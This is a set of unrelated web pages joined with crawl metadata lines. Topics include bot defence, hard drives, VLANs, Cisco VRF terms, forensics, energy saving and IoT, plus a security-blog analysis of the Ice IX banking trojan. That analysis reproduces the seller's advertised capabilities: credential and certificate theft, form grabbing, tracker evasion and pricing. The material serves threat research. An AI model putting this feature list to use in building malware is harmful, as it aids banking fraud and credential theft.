Download or view the Solution Implementation Overview online to learn more about how BMC Consulting Services can help you. Check out The Power of Shifting Left to learn more about amping up your CI/CD pipeline by modernizing your workload orchestration. Then contact the experts at BMC to find out more about how to leverage DevOps and virtualization for enhanced building, testing, and deployment success. | <urn:uuid:c865c996-8ec5-4cb6-a922-ba7f6943be53> | CC-MAIN-2022-40 | https://www.bmc.com/blogs/devops-virtualization/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337625.5/warc/CC-MAIN-20221005105356-20221005135356-00495.warc.gz | en | 0.925223 | 1,523 | 3.15625 | 3 |
Finder estimates that there are roughly 2.19 billion online banking users worldwide in 2022, which accounts for nearly half of all worldwide internet users. As astonishing as this figure might be, it does not represent the traffic of real users, as it includes traffic from malicious bots. Hackers deploy bots as part of email phishing attacks, account takeover (ATO) attacks, scalping attacks, and content scrapings from financial services websites.
Wherever There is Money, There are Bots Trying to Get It
Malicious bots mimic human behavior on the internet to steal sensitive information. Bot attacks initiated by cyber fraudsters result in data breaches, damage to a business’ reputation, interruption of business operations, and customer dissatisfaction. It also results in a number of multi-dimensional security threats such as:
Data Security Threats
Hackers use bots to steal batches of sensitive information about financial products, currencies, transactions, marketing, investments, and research, and then sell this information on the dark web for nefarious purposes.
Account Security Threats
Hackers launch account takeover fraud to gain access to bank accounts. They also initiate smishing attacks to dupe consumers into providing personal information, and use spam-registration attacks to disrupt online banking sites.
Scalping as a Fraud
Hackers conduct rapid-fire, automated purchases of popular ticket items as soon as they become available, and then sell them at grossly inflated prices.
Credit Card and Loan Fraud
Hackers use fake identification to apply for large numbers of credit cards to obtain illegal loans from banks.
Phishing Websites Threats
Based on scraping data collected from official bank websites, phishing websites with similar domains or URLs are used to steal personal information and commit fraudulent activities.
Website Evasion Threats
Hackers set up bots to scan the source code of a web page and the web elements of financial platforms, and then search for potential server vulnerabilities to penetrate further into an organization.
Bot attacks disrupt normal business traffic at a targeted server, service, or network by overwhelming the target or its surrounding infrastructure with a flood of Internet traffic.
Bots are programmed to mimic human behavior while interacting with a website or app, and continue to evolve with each daily scraping. This makes malicious bot attacks hard to identify if you simply implement basic bot solutions. The key to combatting bots is being able to differentiate malicious bot traffic from that of real users.
Making Sense of AI algorithms
Because bot attacks are constantly changing and mutating, with the number of malicious bot attacks doubling over the last three consecutive years (ref: CDNetworks State of Web Security 2021), a sustainable and effective bot management solution is required that has smart defense mechanisms to counter ever-changing attacks.
Artificial Intelligence (AI) has proven to be an effective tool in fighting bot attacks. The CDNetworks’ security platform has exposed AI algorithms to massive (terabyte-scale) attacks on a daily basis. By analyzing machine learning models dynamically, CDNetworks found AI effective in differentiating between legitimate human activity and malicious bots.
CDNetworks’ Bot Shield Solution provides unprecedented bot-fighting AI capabilities. Integrated Watson Machine Learning (WML) algorithms empower Bot Shield with defensive strategies such as multi-dimensional access controls, CAPTCHA challenges, and human-interaction verification to identify and block malicious bots in real time. Best of all, machine learning is updated to address the altering nature of bot attacks.
We are lucky enough to have Bot Shield to block the malicious bots, as it benefits us in revenue, costs and the reputation as well.
An Anonymous Fund Administrator
3 Key Phases to Achieve an Overwhelming Victory
The following example describes how Bot Shield is protecting a publicly funded management company that was taking charge of hundreds of funds. The company’s online services came under bot attack nearly as soon as the services became available.
Bots scraped announcements published on the company websites or in apps and attempted to use malicious traffic to slow or bring down the websites. Worse, the scraping contents were often used for fraudulent purposes. The fund management company explored traditional methods to stop the bot attacks using tools that focused on the granularity of IP, but quickly learned that this approach blocked legitimate users while allowing the malicious bots to rapidly adapt to the IP-based solutions and continue crawling the company’s site. Traditional solutions also have limited effects on low-frequency attacks. Consequently, the fund management company demanded a more dynamic and smarter solution to shield its financial services.
CDNetworks then provided the ideal bot management solution Bot Shield for the fund management company, by using AI to successfully identify and block rogue bots throughout following 3 phases.
Phase 1: Observation and Analysis
Phase 2: Blocked by AI
Using the leading Threat Intelligence Library and fingerprinting capabilities, CDNetworks’ AI algorithms monitored the workflow of key requests directed at the fund management company’s websites. From this monitoring, abnormal behavior models were generated along with access-control strategies for further detections.
A Normal Visiting Workflow
A Suspicious Visiting Workflow
Using the abnormal behavior models, AI identified and blocked all malicious bots accurately, offloading malevolent traffic from the origin and accelerating data transmissions. At the same time, legitimate users were no longer mistakenly blocked from accessing the websites and now enjoy a superior experience while visiting the fund management company’s online platform.
Phase 3: Continuous Protection
To be frank, the battle with malicious bots will never be won. Determined hackers will always find ways to upgrade attack strategies, schemes, and methods. As hackers intensify their fight, the CDNetworks’ AI algorithm will be there, studying the latest analytical models of bot attacks and continuing to build a comprehensive security umbrella to safeguard sensitive and critical information. For the fund management company, the algorithm is blocking over 1 million bot attacks each day.
Increasingly Menacing Security Threats
According to CDNetworks’ State of the Web Security 2021, the CDNetworks’ security platform monitored and blocked 847.71 billion bot attacks. This number well surpassed the previous record of 236% in 2020, posing an increasingly menacing security threat to organizations regardless of industry, shape, or size.
With over 2,800 global points of presence, the CDNetworks platforms carry enormous amounts of Internet traffic and process terabyte-scale log data daily, including massive samples of attack and defense data. CDNetworks’ Bot Shield solution makes use of these worldwide networks and resources and, combined with AI machine learning, protect enterprise businesses. With updated and multi-leveling defense rules, CDNetworks’ Bot Shield boasts a successful track record of blocking different types of bots accurately and effectively. CDNetworks has protected data for organizations covering a myriad of industries, including Finance and E-Commerce, real estate, transportation, and Gaming.
As a global-leading CDN (Content Delivery Network) and Edge Service provider, CDNetworks delivers fully integrated cloud and edge computing solutions with unparalleled speed, ultra-low latency, rigorous security, and reliability. Our diverse products and services include web performance, media delivery, enterprise applications, cloud security, and colocation services — all of which are designed to spur business innovation. | <urn:uuid:356c63de-cd2b-4512-8f14-2e7857b0e271> | CC-MAIN-2022-40 | https://www.cdnetworks.com/cloud-security-blog/3-key-phases-to-stop-the-bot-attacks-on-financial-services-by-cdnetworks-bot-shield/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337855.83/warc/CC-MAIN-20221006191305-20221006221305-00495.warc.gz | en | 0.909256 | 1,606 | 2.546875 | 3 |
A solid-state drive (SSD) is one of the most popular, fastest, and energy-efficient solutions for…
The first hard drive was invented by IBM in 1956. Since then, this piece of technology has completely transformed the way we compute, work and live.
Hard disk drives have been in a nearly constant state of change for the last seven decades. Manufacturers are on a near constant quest to decrease their physical size and cost while increasing their data storage capacity. Considering the average 1GB flash drive today costs less than $5—down from $849 for a 1GB external hard drive sold by Seagate in 1995—it’s safe to say significant progress has been made.
So how are they doing this, what does a hard drive do and how does a hard drive work, anyway?
What does a hard drive do?
You may think you already know the answer to this question. Hard drives store your data, right? Although technically correct, hard drives do a lot more than simply save your information. Put in extremely simple terms, hard drives read and write data.
Hard drives use a complex system of magnets and motors to read and write data in binary code, a computer language composed of a combination of “0” and “1.” Binary code is a fundamental building block of computing. Once data is converted to binary code, the information is spread over the hard drive’s thin magnetic layer. The data is then read and written by a head powered by a high-speed motor.
Information is written to the hard disk drive when an electrical current travels through the heads and imprints binary code onto the hard drive’s magnets. To read data, the process is reversed and electricity travels from the magnets to the read heads to translate the binary code into the user’s recalled information.
This process, although seemingly complicated, consists of several simple elements. But if you really want to know how does a hard drive work, you must understand the parts that make up the whole.
Components of a hard disk drive
There are many different types of hard drives out there, and most of them follow the same basic operational formula. Here are the parts making a hard disk drive tick.
Component #1: Platters
The platters are where the data is stored. They’re double-sided circular discs made of aluminum, glass or ceramic that have been magnetized to store data. Most hard disc drives contain one to five platters. A good rule of thumb: the heavier the drive, the more platters the drive contains.
Modern hard disk drives have two disk heads, one on the top and one on the bottom, to read and write data to each platter. The platters’ information is organized in tracks, sectors and cylinders. These disk heads never come into direct contact with the platters, because even a small amount of friction or a speck of dust could damage a drive.
Component #2: Spindle
Spindles work to rotate the platters when needed and to keep them in position. Most standard hard disk drives have spindle speeds of 7,200 RPM, although spindle speeds can range from 5,400 to 15,000 RPM, depending on the drive. The faster the spindle, the faster the hard drive can read and write data.
This part of the hard disk drive works hard to maintain a specific amount of space between each platter so the read/write arm can fit.
Component #3: Read/Write Arm
We’ve already mentioned the read/write heads, the parts of the hard disk drive that save and recall data from the disk. The read/write arm controls the read/write heads by ensuring they’re in the correct position to read or write data.
This part of the hard drive is also known as the head arm or actuator arm.
Component #4: Actuator
The actuator is quite literally a motor. This component receives instructions from the drive’s circuit board and moves the read/write arm accordingly. The actuator is what ensures the read/write heads are in the right place at the right time.
Hard drives from the ‘80’s used something similar called a stepper motor actuator. This component moved the heads based on a motor reacting to stepper pulses. Today, actuator movement is controlled by a voice coil actuator to control the movement of a coil toward or away from a magnetic platter.
Component #5: Printed Circuit Board (PCB)
The hard drive is powered by electricity, but how? The PCB is the brain powering the hard drive. This component has a microprocessor and an associative memory that converts electrical signals to digital signals.
PCBs hold components delivering power to each part of the hard disk drive at the right time and direct the flow of data to and from the platters and much more.
Component #6: Interface
This part of the drive connects the PCB to the hard drive itself. The interface is one of the leading factors impacting hard disk drive speed. Speed is ultimately determined by what type of interface is within the hard drive. Here are a few of the leading options:
- ATA/IDE: This was the most common PC interface until 2005.
- S-ATA (Serial ATA): This replaced the ATA/IDE and has increased hard drive speed.
- SCSI (Small Computer System Interface): This type of interface is designed to connect various peripherals through an adaptor or SCSI controller.
- SAS (Serial Attached SCSI): is the updated version of SCSI, designed to transfer data from and to hard drives.
Hard disk drive failure
Just like every other electronic device, hard drives do have a risk of failure. They can succumb to logical errors from software or firmware, mechanical damage from breakage or exposure, or simple wear and tear when a spindle or other essential component wears out.
The possibility of hard disk drive failure is why you always need to be prepared with a backup copy of your data! We recommend using a combination of an external hard disk drive and cloud-based backup service so your data will be safe and secure—no matter what happens to your local drive.
If your hard drive fails, and you’re without a backup, there’s still hope. A qualified data recovery professional can work with you to retrieve your data. Contact a data recovery specialist today to save your information. | <urn:uuid:b592a847-8a29-4e98-9c5a-578fb7912303> | CC-MAIN-2022-40 | https://drivesaversdatarecovery.com/how-does-a-hard-drive-work/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334802.16/warc/CC-MAIN-20220926051040-20220926081040-00695.warc.gz | en | 0.933768 | 1,338 | 3.78125 | 4 |
What is a VLAN and How They Work
Quick Definition: A virtual local area network (VLAN) is a way of dividing a network so that the number of broadcasts, as well as the level of access users have, is limited. The "virtual" in VLAN refers to the fact that the local area network is physically unchanged, but a layer of logic splits the network into multiple pieces.
An Overview of VLANs [VIDEO]
In this video, Jeremy Cioara covers VLANs. Having the same IP subnet is fine for a small network, but too many broadcasts can slow down the network and even the devices on it. VLANs solve that problem and can enable a “local” network across an entire campus.
How Does a Normal LAN Work?
To understand what a VLAN is, you need to understand how a normal LAN really works. Devices connected to a switch send frequent broadcasts to get IP addresses, to find network resources, and to communicate with one another. With few devices on a network, those broadcasts don't represent a problem. But if the number of devices is high, all those broadcasts can dramatically slow down each device on the network.
When you take a usual switch out of the box and start plugging devices into it, they need to be a part of the same TCP/IP subnet. To start, let's imagine that switch: a six-port switch into which we plug two devices. The first device might be at 10.1.1.50 /24 and the other at 10.1.1.51 /24. The /24 in their IP addresses simply means that anything with 10.1.1. is part of the same network as them.
These two are able to access each other and they're able to access network resources. But when they communicate, they're broadcasting to one another — and any other device on the network. A broadcast is a message that goes to everyone on the network and many network communications are transmitted as broadcasts. And those broadcasts are like highway traffic. There can only be so many cars on one road, and there can only be so many broadcasts on one network.
As the network grows, there are going to be more and more broadcasts. If those two computers become 20, which in turn become 200 — maybe eventually 2000 — computers, the number of broadcasts will also increase dramatically.
Broadcasts are a necessary part of network traffic. They need to happen. Broadcasts are how the computers get IP addresses, how they find network resources, how they communicate with each other. So broadcasts are a natural byproduct of networks, but they slow things down. They slow down the network, and even individual computers plugged into the network.
What are the Security Concerns on a LAN?
One of the benefits of a LAN is how easy it is for users to access network resources and resources on any other device on the network. This can easily be a liability too; there should always be some concern when any network user has full access to every other device. And in that respect, a LAN can be a security risk.
Imagine a less-than-scrupulous user on your network. The nature of a LAN means he can access all the resources of anyone else on the network. That bad user could fully access devices everywhere else, and if they decide to steal all the network data from another user, it's nearly impossible to prevent that from happening, without getting a high-end switch that has some extensive Layer 2 features.
Why are VLANs Better Than LANs?
A VLAN breaks a single network into multiple sections. By logically separating ports and additional switches from one another, a VLAN effectively creates multiple standalone networks out of the same networking backbone. This is more secure, and it reduces the number of broadcasts individual devices receive.
What a VLAN does, and why it's called a "virtual" LAN, is take one switch or one typical network and break it into multiples. Imagine three switches chained together by trunks. Each switch has six ports, and a device plugged into each port. We could imagine two VLANs on that network by assigning every other port to one of our VLANs. Though in reality it could be any combination of ports to VLANs.
And it could even be 20 or 200 different VLANs, all depending on your organization's needs. Maybe your organization has an accounting team and a sales team, and your VLANs are separating those teams.
You want to keep those separate first because of security. You know how those scandalous sales people can be: they'll probably hack into the accounting department to find out what the other sales reps are making. But when you put a VLAN in place, you're effectively breaking each switch into two pieces — making it impossible for users to listen in on one another just because they're on the same physical switch.
If you've seen the 1960s TV show Get Smart, you'll remember how often Maxwell Smart demanded the Cone of Silence. Well, the Cone of Silence was kind of the original VLAN. With one, what the accounting department says among themselves is kept private, and what the sales department says on their network can't be listened to.
A VLAN is an improvement on a LAN because you get a security boundary and broadcast separations.
How Many Switches Can a VLAN Support?
The beauty of VLANs is that they transcend switches. As we've already mentioned, a VLAN can pass between multiple switches, which is done through a trunk port. The limits on the number of switches and VLANs that can be created are complicated, but it would be difficult to exceed the number of switches your VLAN can support.
What happens is this: imagine that the accounting department sends a broadcast. The switch knows what other ports are assigned to the accounting dept, because you went in and configured that. On top of that, the switch looks for what Cisco calls trunk ports and what other vendors call a tagged port.
What happens is that the accounting broadcast goes out that "trunk" or "tagged" port to other, connected switches and the broadcast gets a little tag on the end that tells the next switch what VLAN it belongs to.
VLANs are numbered, they're not named. So, in our example, maybe the accounting VLAN is VLAN 10. So as the message gets forwarded down to a different switch, the broadcast gets tagged for VLAN 10 and each subsequent switch recognizes which VLAN the message belongs with — and handles it accordingly.
Trunks always forward all the traffic and still allow the VLANs to communicate. That means you can have a campus-wide VLAN network in which each separate department is separated logically through these VLANs.
How Does Voice Over IP Get Affected by VLANs?
Voice over IP is a great practical example of how VLANs enhance network operations. VoIP is a huge and growing technology — it's basically plugging a phone into a network.
From a security perspective, that seems like a terrible idea. Because now you have phone conversations going across the network in the clear. There are already tools out there. One is, in fact, very popular: WireShark. WireShark allows you to sniff network packets, take phone conversations, and convert them to .wav files. So all you have to do is just double-click the .wav and hear the phone conversation.
It gets even worse when you find out that the right design for this is to daisy-chain computers from phones to save on a cabling infrastructure. That could potentially mean that an entire organization's phone conversations pass through one network — and that's a lot of data that could interrupt or be interrupted by the other, standard, network traffic.
What you can do with VLANs is completely separate those phones into their own logically separated network. In that place, the computers cannot touch them, and vice versa.
They're completely isolated from everybody, both from a security perspective, people can't get in on WireShark and start tapping phone conversations, but also from a broadcast perspective: all that computer data will never impact the phones themselves and how they're performing.
With the security and efficiency boosts a network sees from implementing them, it's no wonder that virtual local area networks are the hallmark of a serious campus-wide network. Wiring them and configuring their operation usually requires careful attention and significant training. Need a suggestion for training? Try our Cisco CCNA training. | <urn:uuid:b25ec413-86b8-4a60-b2be-4b7b1c678e37> | CC-MAIN-2022-40 | https://www.cbtnuggets.com/blog/technology/networking/what-is-a-vlan-and-how-they-work | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335444.58/warc/CC-MAIN-20220930051717-20220930081717-00695.warc.gz | en | 0.953252 | 1,766 | 4.21875 | 4 |
CE device —customer edge device. A device that is part of a customer network and that interfaces to a provider edge (PE) device.
Inherit-VRF routing —Packets arriving at a VRF interface are routed by the same outgoing VRF interface.
Inter-VRF routing —Packets arriving at a VRF interface are routed via any other outgoing VRF interface.
IP —Internet Protocol. Network layer protocol in the TCP/IP stack offering a connectionless internetwork service. IP provides
features for addressing, type-of-service specification, fragmentation and reassembly, and security. Defined in RFC 791.
PBR —policy-based routing. PBR allows a user to manually configure how received packets should be routed.
PE device —provider edge device. A device that is part of a service provider’s network and that is connected to a CE device. It exchanges
routing information with CE devices by using static routing or a routing protocol such as BGP, RIPv1, or RIPv2.
VPN —Virtual Private Network. A collection of sites sharing a common routing table. A VPN provides a secure way for customers
to share bandwidth over an ISP backbone network.
VRF —A VPN routing and forwarding instance. A VRF consists of an IP routing table, a derived forwarding table, a set of interfaces
that use the forwarding table, and a set of rules and routing protocols that determine what goes into the forwarding table.
VRF-lite —A feature that enables a service provider to support two or more VPNs, where IP addresses can be overlapped among the VPNs. | <urn:uuid:d61f9320-7165-4d3d-ae49-e9f41b1e4aa4> | CC-MAIN-2022-40 | https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/iproute_pi/configuration/xe-16-6/iri-xe-16-6-book/mp-mltvrf-slct-pbr.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00695.warc.gz | en | 0.888316 | 341 | 2.625 | 3 |
A new trojan was briefly presented to cybercriminals in the Russian-speaking underground in late April 2011 (as v1.0.0). The developer who wrote the new trojan, and named it "Ice IX", openly declared that he developed his new trojan based on the ZeuS v2 source code, and in doing so allegedly perfecting flaws and bugs he believed needed fixing to improve the product's value to its cybercriminal customers.
What's in a name: the meaning of "Ice IX"
The naming of Ice IX is quite interesting; there are a number of sources from which the developer could have been inspired to name the new trojan Ice IX. I've listed these in order from "most likely" to "least likely" to have been the inspiration.
- Ice 9 is a fictional computer virus from the film "The Recruit" (2003). The malware, named Ice-9 in tribute to Kurt Vonnegut's ice-nine (see item no. 8 below), would erase hard drives and travel through power sources which are not protected; possibly erasing data from every computer on Earth.
- Ice 9 is an album by Russian rock band Smyslovye Gallyutsinatsii, two songs from which won the Russian Golden Gramophone award twice. The band is also known under a much shorter name "Glyuki", a slang term, which means basically the same as the long name: glitches in your brain. More: http://en.wikipedia.org/wiki/Smyslovye_Gallyutsinatsii
- ICE is a well known cyberpunk reference to "Intrusion Countermeasures Electronics" - software which works to prevent intruders/hackers/cyberpunks getting access to sensitive data. It is "visible" in cyberspace as actual walls of ice, stone, or metal. Black ICE refers to ICE that are capable of killing the intruder if deemed necessary or appropriate; some forms of black ICE may be artificially-intelligent. More: http://en.wikipedia.org/wiki/Intrusion_Countermeasures_Electronics
- In cryptography, ICE (Information Concealment Engine) is a block cipher published by Kwan in 1997. The ICE algorithm is not subject to patents, and the source code is in the public domain. More: http://en.wikipedia.org/wiki/ICE_(cipher)
- The term ICE, referencing the cyberpunk usage, has been adopted by some real-world security software manufacturers: BlackICE, security software made by IBM Internet Security Systems. Black Ice Defender, security software made by Network ICE. Network ICE, a security software company.
- On April 28, 2009, the Information and Communications Enhancement Act, or ICE Act for short, was introduced to the United States Senate by Senator Tom Carper to make changes to the handling of information security by the federal government, including the establishment of the National Office for Cyberspace. More: http://www.opencongress.org/bill/111-s921/show
- Ice IX is a form of solid water stable at temperatures below 140 K and pressures between 200 and 400 MPa. It has a tetragonal crystal lattice and a density of 1.16 g/cm³, 26% higher than ordinary ice. It is formed by cooling ice III from 208 K to 165 K (rapidly—to avoid forming ice II). Its structure is identical to ice III other than being proton-ordered. More: http://en.wikipedia.org/wiki/Ice_IX
- Ice-nine is a fictional material conceived by writer Kurt Vonnegut in his 1963 novel "Cat's Cradle". It is different from, and does not have the same properties as, the real-world ice polymorph Ice IX; existing, for example, as a stable solid at room temperature and regular atmospheric pressure. More: http://en.wikipedia.org/wiki/Ice-nine
- Ice 9 is a song by Joe Satriani from his album Surfing with the Alien.
- Ice Nine is a first-person shooter game for the Game Boy Advance console. More: http://en.wikipedia.org/wiki/Ice_Nine_(game)
- A substance called Ice 9 is referred to in the Nintendo DS game "999: Nine Hours, Nine Persons, Nine Doors". It seems to be a reference to Vonnegut's ice-nine substance, and not to the real thing. More: http://en.wikipedia.org/wiki/999:_Nine_Hours,_Nine_Persons,_Nine_Doors
- Ice Nine is the name of a new screenplay which is currently in development by New York production company Whiskey Outpost. More: http://whiskeyoutpost.com/ice.html
The new feature considered most valuable by Ice IX's developer is the implementation of a defense mechanism designed to evade Tracker sites, which he managed to implement in version 1.0.5 of the Ice IX trojan. Repeatedly stressed by Ice IX's developer, his buyers will finally be able to sidestep what has apparently become quite the hurdle for cybercriminals - ZeuS and SpyEye trackers. The two main tracker sites, "ZeuS tracker" and "SpyEye tracker" are operated by a Swiss-based organization which monitors and reports malicious C&C (Command and Control) servers to web users, service providers, CERTs and law enforcement agencies. Ice IX's developer claims that the evasion mechanism means the malware can be hosted on standard (legitimate) hosting servers, as opposed to having to use so called "bulletproof" servers which are expensive and typically operate specifically to service cybercrime-based customers.
A Better Injection Mechanism
Marketing the Malware
Extracts from the original text posted by Ice IX's developer in a Russian forum, translated to English:
Ice 9 is a new private Form Grabber-bot based on ZeuS, but a serious rival to it. Built on a modified ZeuS core, the core was re-worked and improved. The bypassing of firewalls and other proactive defenses was perfected. Moreover, the injection mechanism has been improved, allowing much more stability for the injections. The main purpose of this trojan was to counteract trackers, raising the conversion rate and the bots' TTL (time to live), as compared to its predecessor. These features were successfully implemented as we constantly work to further improve the code.
- HTTP and HTTPS Form Grabbing, injecting its own code into IE and into IE-based browsers (Maxton, AOL, etc..), as well as Mozilla FireFox.
- .sol Cookie Grabbing and scraping info from saved forms
- FTP client credentials grabbing: FlashFXP, Total Commander, WsFTP 12, FileZilla 3, FAR Manager 1, 2, WinSCP 4.2, FTP Commander, CoreFTP, SmartFTP
- Windows Mail, Live Mail, Outlook grabbing
- Socks with backconnect possibility
- Real-Time screenshots, plus the option to automate taking screenshots while the bot browses to preset URLs
- Grabs certificates from MY storage space and clears storage (certificates marked as “Non-Exportable” cannot be exported correctly). Once cleared, all new certificates will be sent to the bot master's C&C server.
- Upload specific files from the infected machine or perform searches on local disks enabling wildcards.
- TCP protocol traffic sniffer
- Elaborate set of commands to control the infected PCs
- Protected from trackers¹
- Host your botnet with conventional hosting, not needing bulletproof servers, which will save you loads of money.
- Better bot conversion rate², frequent version upgrades and tech support.
- Developing more modules and features may be negotiated per the client’s request.
² Bot conversion rate is the ratio of the number of bots which actually communicate with the C&C server divided by the total number of bots infected.
Licensing and Prices for Version 1.0.5
- BASIC LICENSE: Trojan with hardcoded C&C server: $600. You get the Bot + the Builder that generates the configuration file.
- COMPLETE LICENSE: Open Trojan with unlimited Builder license: $1,800
Ice IX is offered at a lower price than what one would have paid for a comparative ZeuS kit or a SpyEye kit (SpyEye is still being sold for an approximate $4,000 USD today). According to earlier posts about Ice IX an open license to the first version v1.0.0 was sold for $1,500.
In an English-speaking online forum, the trojan's developer gives potential buyers a glimpse into what will be included in the next upgrade:
- A function that will block the SpyEye trojan on Ice IX-infected PCs (this sounds exactly like the 'Kill ZeuS' feature of SpyEye).
- As with ZeuS, Ice IX will encrypt communication with the C&C server, using a different encryption algorithm to ZeuS.
After the posting of Ice IX, another vendor selling HTML injections offered his stamp of approval of the Ice IX trojan. The new Ice IX buyer had some opinions on the injection mechanism of Ice IX:
- CSS files are successfully injected; it appears that Ice IX supports the use of Cascading Style Sheets in the process of integrating injected content into the original website's look and feel. This improvement steps-up the appearance of injected content and web page replicas.
- The order of data_before, data_after, data_inject blocks plays no role. The trojan understands them in any block order. When referring to data_before / data_after blocks, the fraudster is speaking of the delimitations that must be specified to a web injection. For example:
- Data_before: When a login set requires username, password and secret question, the data_before is all three sets
- Data_inject: The additional data that the fraudster would like to inject into the page
- Data_after: The lower limit field of the data the trojan looks for
So we can expect that from now on, more new banking malware will be based on ZeuS (and SpyEye) code. New malware developers, hoping to profit from cybercrime, will attempt to create their own new alternatives based on this source with the addition of incremental improvements over the older versions.
Subscribe to posts via RSS | <urn:uuid:e8f86957-3d18-4737-bb24-d92a48de68d9> | CC-MAIN-2022-40 | https://www.internetsecuritydb.com/2011/08/meet-ice-ix-son-of-zeus.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336674.94/warc/CC-MAIN-20221001132802-20221001162802-00695.warc.gz | en | 0.929994 | 2,353 | 2.625 | 3 |
In recent years as computers and mobile phones have become ubiquitous, the analysis of digital evidence has become necessary in the majority of legal cases. Even where a computer or phone is unlikely to have been used directly in the commission of a crime, communications records on such devices may still reveal vital evidence as to motive or guilt.
Computer forensics, also known as digital forensics, involves the analysis of computers and other electronic devices in order to produce legal evidence. Such investigations are typically long and complex, so as the average forensic caseload grows, so too does the need for an effective method to manage the dissemination of information between the many authorised personnel involved in an investigation.
With forensic experts and police high tech crime unit personnel each performing different functions simultaneously as part of an investigation, the sheer weight of update requests sent back and forth can place a drag on the investigation. For this reason, a central location where up-to-the-minute information about a case can be gleaned is becoming essential.
With time being a factor in almost all investigations, it is simply not viable to allow a single member of personnel to become a bottleneck. Therefore, it is practical for such management to be carried out electronically through a central database, giving authorised personnel the ability to track a case’s progress without the need to inundate the Officer in Charge, or the Forensic Investigator with update requests. Similarly, the use of such a system means that the disruption caused by a staff absence can be avoided, since any required information should be entirely up-to-date and stored centrally.
In addition, if such a system includes the ability to schedule analyses, then police investigators will be able to pass back requests to prioritise particular cases or devices to ensure that findings are returned as they are needed. Where cost is a factor, such a system also helps to ensure that unnecessary analyses are not carried out.
All forensic findings must also be presented in a format that is easily understood by the potentially wide variety of parties involved in an investigation, some of whom may be significantly less well-versed in the nature of a computer forensic investigation than others. As such, a central management system with set tools for reporting findings ensures that all findings are presented in a consistent manner that is interpretable to all personnel.
For any computer forensic evidence to be admissible in court, the forensic analyst must follow set procedures for the handling of computer-based evidence as prescribed by the Association of Chief Police Officers. This means that the entire investigation must be fully auditable, with no movements left unaccounted for in the records. As such, the use of a central system to manage case progress and track resource locations is one way to ensure that evidence is not lost, contaminated or rendered inadmissible.
While most police units and computer forensic investigators have systems in place that perform some of the functions described above, a broadly used system has yet to implemented. As computer forensic caseloads continue to grow, it seems likely that the police and computer forensic investigators will look increasingly towards a method to centralise and share data that is consistent across the UK. | <urn:uuid:e0fbd78c-9d1b-4303-9db5-d11cd5a8e53e> | CC-MAIN-2022-40 | https://www.intaforensics.com/2016/03/05/case-management-systems-and-resource-control-in-computer-forensics/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337360.41/warc/CC-MAIN-20221002212623-20221003002623-00695.warc.gz | en | 0.95326 | 627 | 3.171875 | 3 |
Nowadays, there’s a computer in almost every home and office. A typical desktop that’s switched on 24/7 for a whole year releases carbon dioxide equivalent to what an average car releases in an 820-mile drive. To save energy, you don’t need to make drastic changes.
It’s a dilemma: you want to save energy, but you need to use your PC every day. You can turn off your computer when it’s not in use, but a plugged-in PC or electrical appliance, even when switched off, still consumes standby power. If this is the case, how exactly can you save energy? Here are some tips.
Every home or office has a computer. In one year, a typical desktop that’s on 24/7 releases carbon dioxide that’s equal to driving 820 miles in an average car. To save energy, you don’t need drastic changes; you can start with making small adjustments that will ultimately accumulate to significant savings. | <urn:uuid:1d65f699-1248-4153-858c-dd47c0571b37> | CC-MAIN-2022-40 | https://www.alcalaconsulting.com/tag/power-saving/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337480.10/warc/CC-MAIN-20221004054641-20221004084641-00695.warc.gz | en | 0.933647 | 210 | 2.984375 | 3 |
Phones may have been the first devices to become “smart,” but the Internet of Things (IoT) aims to raise almost every object around us to that status. When we connect objects to the internet, the possibilities are virtually endless. We can operate them remotely from computers or phones, check on their status to ensure they’re functioning properly, or even optimize them to increase efficiency and reduce operating costs.
The potential of the Internet of Things is rapidly catching on. By 2020, it’s expected to become a $9 trillion industry — growing from just $3 trillion in 2014. From Fitbits, to the Amazon Echo and Google Home, to a toaster that will tell you the weather, IoT devices are becoming more pervasive than ever.
One of the most important contributing factors to the IoT’s continued success is the prevalence of the cloud. IoT applications are dependent on the cloud and its numerous benefits, which I outline below:
It won’t be long until nearly every device is a smart device — the IoT-connected smart home will have smart thermostats, smart lights, smart appliances, and even smart sprinklers. All these and many more devices demand additional processing power, and the cloud makes it easier for developers to deploy these processes.
- Detailed Analytics
The IoT is all about data, and the data analytics possibilities offered by the cloud will help developers understand how these devices are performing their various functions. It will also be useful to the consumer, who will be able to stay informed about the operating status of various devices. Data has been called the “new oil,” and businesses in the data and analytics space are rushing to take advantage of rich data mining opportunities presented by the IoT environment.
Cloud infrastructure provides an incredibly accessible environment where developers who aren’t backed by enormous corporate budgets can still create innovative new devices that take advantage of IoT connectivity. Without the “plug and play” opportunity provided by the cloud, these talented developers would have a much more difficult time turning their visions into reality.
Many IoT devices have struggled with security issues, and it’s no wonder consumers aren’t exactly in the habit of keeping their refrigerator’s software up to date. Fortunately, cloud connectivity can help minimize security risks. For devices with the same back-end infrastructure and APIs, security updates can be downloaded from the cloud almost instantly. Furthermore, these devices can even warn each other of potential security risks.
- Inter-Device Communication
IoT devices have a wealth of useful information to share with consumers, but they become even more effective when they share information with each other. Imagine your smart thermostat telling your smart blinds when to shut out light, saving on the cost of cooling your home in the heat of summer. The cloud facilitates the communication between these devices as interfaces become streamlined and easier to use.
IoT technologies are changing the game, but they’re also putting those reliant on legacy infrastructures at a disadvantage. We have been working on several modernization projects for enterprises looking to adopt the cloud in order to experience improved connectivity with IoT devices.
I encourage IT and business leaders to learn as much as they can about hybrid cloud and plan for a future with ubiquitous IoT. You can’t flick a switch and immediately transform a whole organization’s architecture — it will take time to plan, but a hybrid approach will allow you to establish the right mix of application hosting options.
